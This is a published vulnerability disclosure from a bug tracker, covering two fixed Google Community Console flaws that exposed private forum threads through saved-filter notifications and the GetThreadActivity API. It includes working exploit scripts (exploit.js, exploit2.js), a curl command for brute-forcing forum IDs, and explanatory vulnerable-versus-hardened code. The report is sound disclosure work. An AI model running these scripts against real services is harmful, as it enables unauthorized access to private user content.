
Subscriptions to saved filters trigger email notifications for unauthorized threads
Verified · Public

Description

WARNING: this report SHOULDN'T be published until the vulnerability in T25#429 has been fixed.

This is a bug I reported to Google via Google's Vulnerability Rewards Program on Jan 2, 2021.

Below is an intact reproduction of the report sent to Google (I censored some parts):

Reproduction steps

  1. Open Chrome and sign in at Google with any regular Google Account (it can be a new one).
  2. Go to https://support.google.com/chrome/thread/83519363?hl=en and press the "upvote" button so a forum profile is automatically created and associated to the Google Account. (not necessary if the profile already exists)
  3. Go to https://support.google.com/ and open the Javascript Console (Ctrl+Shift+J/Cmd+Alt+J).
  4. Run the following Javascript code in the Javascript Console:
exploit.js
// This script does the following things so the user can receive email
// notifications for new posts in a specific forum:
//   1. It saves a custom filter which matches threads from the target forum.
//   2. It subscribes to the filter so the user receives notifications for new
//      threads which match the filter.

// In this example the target forum is the [REDACTED] Private Forum:
var targetForum = '[REDACTED]';
// This is a unique name for the new filter:
var filterName = 'filtertest';

// HTTP request to create a saved filter for threads of the target Forum in
// English
fetch('https://support.google.com/s/community/api/CreateSavedSearch', {
  'headers': {
    'content-type': 'text/plain; charset=utf-8',
  },
  'body': JSON.stringify({
    2: {
      1: filterName,
      2: 'forum:' + targetForum + ' lang:en',
    },
  }),
  'method': 'POST',
  'mode': 'cors',
  'credentials': 'include'
}).then(_ => {
  // HTTP request to subscribe to the saved filter
  fetch('https://support.google.com/s/community/api/SubscribeToSavedSearch', {
    'headers': {
      'content-type': 'text/plain; charset=utf-8',
    },
    'body': JSON.stringify({
      1: filterName,
      3: [targetForum],
    }),
    'method': 'POST',
    'mode': 'cors',
    'credentials': 'include'
  });
});
  5. Now, with a Google Account which has access to the private forum specified in the script (in the example the English Chrome Gold+ Private Forum), create a thread there by visiting https://support.google.com/s/community/new (select the forum and language according to the filter).
  6. Wait some time (up to 2 hours).
  7. The user who ran the script will receive an email notification about the new thread, even if that user doesn't have access to that private forum/thread.

Browser/OS: N/A

The issue is that the code which triggers notifications doesn't take into account the user's context: the fact that users don't necessarily have access to all the threads.
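The root-cause sentence above is the whole fix in one line: notifications have to be resolved in the subscriber's context. The following JavaScript is an added example, not Google's code, that models the saved-filter fan-out: the vulnerable recipient selection only asks whether a saved filter matches the new thread, while the hardened selection additionally checks that each matching subscriber can read the thread's forum. The forum table, user names, the `forum:<id> lang:<code>` query grammar and the `canAccessForum` helper are all constructed for illustration.

```javascript
// Added example (not Google's code). All forum, user, filter and thread data
// below is constructed; forum IDs are arbitrary strings.
const forums = {
  '1479660': { name: 'Chrome Help (public)', private: false, members: null },
  '9001': { name: 'Chrome Gold+ Private Forum', private: true, members: new Set(['pe-alice']) },
};

// Saved filters, one per subscriber. The first one is what exploit.js creates:
// a query pinned to the private forum by a user who is not a member of it.
const savedSearches = [
  { owner: 'attacker', name: 'filtertest', query: 'forum:9001 lang:en' },
  { owner: 'pe-alice', name: 'gold-en', query: 'forum:9001 lang:en' },
  { owner: 'bob', name: 'chrome-en', query: 'forum:1479660 lang:en' },
];

// Compile "forum:<id> lang:<code>" into a predicate over thread objects.
// Unknown terms are ignored; missing terms match anything.
function compileQuery(query) {
  const terms = Object.fromEntries(
    query.split(/\s+/).filter(Boolean).map(t => t.split(':', 2)));
  return thread =>
    (!terms.forum || thread.forumId === terms.forum) &&
    (!terms.lang || thread.lang === terms.lang);
}

// Assumed access model: public forums are readable by everyone, private
// forums only by their members. Unknown forum IDs are never readable.
function canAccessForum(userId, forumId) {
  const forum = forums[forumId];
  if (!forum) return false;
  return !forum.private || forum.members.has(userId);
}

// Vulnerable: the match is evaluated against the thread alone, so anyone who
// managed to save a filter for the private forum is emailed its new threads.
function recipientsVulnerable(thread) {
  return savedSearches
    .filter(s => compileQuery(s.query)(thread))
    .map(s => s.owner);
}

// Hardened: a filter match is necessary but not sufficient. The notification
// is built per recipient, and recipients who cannot read the forum are dropped.
function recipientsHardened(thread) {
  return savedSearches
    .filter(s => compileQuery(s.query)(thread))
    .filter(s => canAccessForum(s.owner, thread.forumId))
    .map(s => s.owner);
}

// Constructed thread posted in the private forum (reproduction step 5).
const newPrivateThread = { id: 't-1', forumId: '9001', lang: 'en', title: 'Gold+ only' };

console.log('vulnerable:', recipientsVulnerable(newPrivateThread));
console.log('hardened:  ', recipientsHardened(newPrivateThread));
```

The check has to happen where the notification is generated, not where the filter is saved: a subscriber's forum membership can change after the filter exists, and the query string itself is user-controlled.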

Attack scenario

This vulnerability can be exploited by any user as mentioned in the reproduction steps, although in order to come up with those steps the user needs to understand at least partially how the Community Console API works.

The Community Console is only accessible by Googlers and Product Experts (https://productexperts.withgoogle.com/what-is-it), so only those (and ex-Product Experts) would be able to learn directly how the Community Console API works (without taking into account that other users could learn this indirectly).

The attack scenario is the following:

  1. Find a forum ID for a private forum. This can be done in several ways:
    • Brute force forum IDs: call the https://support.google.com/s/community/api/GetForum API endpoint with different forum IDs starting from 0 in ascending order, and when the endpoint returns an "Unauthorized" response, that means that's a forum we can target. This is feasible to do. Example of a call to the GetForum endpoint: curl 'https://support.google.com/s/community/api/GetForum' -H 'content-type: text/plain; charset=utf-8' --data '{"1":"1479660"}'
    • Find the forum IDs in URLs shared "publicly". The person sharing the link might think that sharing the URL with some people who maybe don't have access to that thread is not bad because the access will just be denied (so they trust the server to provide proper access control). This is rarely the case, but can happen.
  2. Follow the reproduction steps attached in this report with the ID of the private forum, in order to create the saved filter and subscribe to it.

By doing this, the attacker can gain access to the content of the first message for each thread created after subscribing to the filter in that forum. [REDACTED]

Details

Vendor
Google
Product
Community Console
Reported
Jan 2 2021, 1:41 PM
Reward
3133

Event Timeline

avm99963 triaged this task as Priority-1 priority.Jan 2 2021, 2:09 PM
avm99963 created this task.

Another vulnerability similar to this one was reported to Google on Jan 8, 2021 as a comment in the same bug opened by this vulnerability report, due to the similarities between both vulnerabilities.

This is an intact reproduction of the report sent to Google (I censored some parts):

I just found another vulnerability similar to the one reported here (the result is unauthorized access to partial information of some private threads). Because of the similarity, I'll report it here as a comment, but let me know if this should be treated in a separate bug.

Also, as a side note: this vulnerability can be leveraged to exploit the original saved filters vulnerability more easily.

Abstract

Any signed-in Google user can obtain partial information about an escalation to a private forum via the GetThreadActivity API method.

Reproduction steps

  1. Prepare the environment:
    1. Open Chrome and sign in at Google with any regular Google Account (it can be a new one).
    2. Go to https://support.google.com/chrome/thread/83519363?hl=en and press the "upvote" button so a forum profile is automatically created and associated to the Google Account. (not necessary if the profile already exists)
  2. Go to https://support.google.com/ and open the Javascript Console (Ctrl+Shift+J/Cmd+Alt+J).
  3. Now, in the Javascript Console, run the following Javascript script, which will call the GetThreadActivity method for a thread which we know has been escalated to a private forum:
exploit2.js
fetch('https://support.google.com/s/community/api/GetThreadActivity', {
  'headers': {
    'content-type': 'text/plain; charset=utf-8',
  },
  'body': JSON.stringify({
    1: '[REDACTED]', // Forum ID
    2: '[REDACTED]', // Thread ID
    3: 'es', // Language
  }),
  'method': 'POST',
  'mode': 'cors',
  'credentials': 'include',
}).then(res => res.json()).then(res => console.log(res));
  4. An object with the response will be printed in the Console when the request finishes. Expand it, and you'll see several entries. One of them, which looks like this (I commented the most relevant parts), corresponds to the escalation:
{
  "1": "[REDACTED]",
  "2": "[REDACTED]",
  "3": "[REDACTED]",
  "4": 3,
  "5": { ... }, // Omitted: this is info about the user who escalated the thread
  "6": "[REDACTED]", // Private forum name
  "7": {
    "2": {
      "1": {
        "1": "[REDACTED]", // Thread ID of the escalation in the private forum
        "2": "[REDACTED]",
        "3": "[REDACTED]", // Private forum ID
        "4": "[REDACTED]"
      },
      "7": "[REDACTED]",
      "9": "Al entrar a Chome la pantalla se palidece y de torna amarilla. ", // Escalation title (Spanish: "When opening Chrome the screen fades and turns yellow.")
      "10": "[REDACTED]",
      "12": {},
      // Snippet of the escalation body:
      "13": "¡Hola!\n[REDACTED]", // Spanish: "Hello!"
      "14": "es",
      "15": 20,
      "17": "[REDACTED]",
      "21": 7,
      "24": 0,
      "32": 1,
      "36": true,
      "39": "[REDACTED]"
    },
    "4": { ... } // Omitted: more info about the user who escalated the thread
  }
}

Attack scenario

The set of people who can become aware of and exploit the vulnerability is the same as the one described in the original report.

The attack would be the following:

  1. Search the keyword "escalate" in the Google Communities/forums. For example, visit https://support.google.com/s/community/search/query%3Dforum%253Aany%2Blang%253Aen%2Bescalate or manually perform the API call which the frontend code does to get the list of threads when opening that page.
  2. For each thread in the list, run the reproduction steps, setting the appropriate thread/forum/language in the Javascript code.

This will obtain the title and a snippet of the escalation thread (which should not be visible to the user, as the escalation thread is private), and the private forum and escalation thread IDs.

Apart from the fact that this would grant limited access to the private thread contents, the private forum ID returned can be used to exploit the original saved filters report.
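The second report is the pull-side twin of the first: the activity feed embeds the escalation target (private forum name and ID, private thread ID, title, body snippet) verbatim, without asking whether the viewer may read that forum. The following JavaScript is an added example, not Google's code, modelling a GetThreadActivity-style handler before and after the check. Field names are descriptive instead of the numeric keys in the real response, the access model is the same constructed one as above, and the decision to keep a bare "an escalation happened" stub rather than drop the entry entirely is an assumption about the desired product behaviour.

```javascript
// Added example (not Google's code). Forum ACL, users and activity entries are
// constructed for illustration; the real API uses numeric protobuf-style keys.
const forumAcl = {
  'chrome-es': { private: false, members: null },
  'pe-private-es': { private: true, members: new Set(['pe-carol']) },
};

// Assumed access model, as in the notification example: public forums are
// readable by everyone, private forums only by their members.
function canAccessForum(userId, forumId) {
  const forum = forumAcl[forumId];
  if (!forum) return false;
  return !forum.private || forum.members.has(userId);
}

// Activity for a public thread. The escalation entry carries the target
// thread whole, exactly the shape of the leak described in the report.
const activity = [
  { type: 'reply', actor: 'user-1', text: 'Have you tried a fresh profile?' },
  {
    type: 'escalation',
    actor: 'pe-carol',
    target: {
      forumId: 'pe-private-es',
      forumName: 'Product Experts (private)',
      threadId: 'esc-77',
      lang: 'es',
      title: 'Screen turns yellow when Chrome starts',   // constructed
      snippet: 'Hello! User reports a yellow tint on ...', // constructed
    },
  },
];

// Vulnerable: the stored entries are returned as-is to any signed-in viewer,
// so the private forum ID, thread ID, title and snippet all leak.
function getThreadActivityVulnerable(viewerId, entries) {
  return entries;
}

// Hardened: every entry that references another forum is resolved against the
// viewer. If the viewer cannot read the target forum, only the fact that an
// escalation took place survives; no identifier or content from the private
// thread is returned (assumed desired behaviour).
function getThreadActivityHardened(viewerId, entries) {
  return entries.map(entry => {
    if (entry.type !== 'escalation') return entry;
    if (canAccessForum(viewerId, entry.target.forumId)) return entry;
    return { type: 'escalation', actor: entry.actor, target: null };
  });
}

// Returns true if any string in the serialised response mentions the private
// thread or forum. Handy as a regression check on the hardened handler.
function leaksPrivateTarget(response) {
  const s = JSON.stringify(response);
  return s.includes('esc-77') || s.includes('pe-private-es');
}

console.log('vulnerable leaks:', leaksPrivateTarget(getThreadActivityVulnerable('attacker', activity)));
console.log('hardened leaks:  ', leaksPrivateTarget(getThreadActivityHardened('attacker', activity)));
```

Withholding the private forum ID matters twice here: it is part of the escalation's content, and, as the report notes, it is also the input the saved-filter attack needs.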

avm99963 changed the task status from New to Accepted.Feb 9 2021, 5:58 PM

Google mentioned on Jan 7 that a bug report was filed based on my report, so I'm marking this issue as accepted.

I just confirmed that the main vulnerability is fixed, while the one in comment T25#429 isn't.

I just checked T25#429 hasn't been fixed yet, so I just sent a message in the Buganizer bug to state that.

T25#429 is now fixed (Google notified me on Feb 19, 2022, and I could verify it now). Thus, publishing the whole report.

avm99963 changed the visibility from "Restricted Project (Project)" to "Public (No Login Required)".Oct 1 2022, 7:03 PM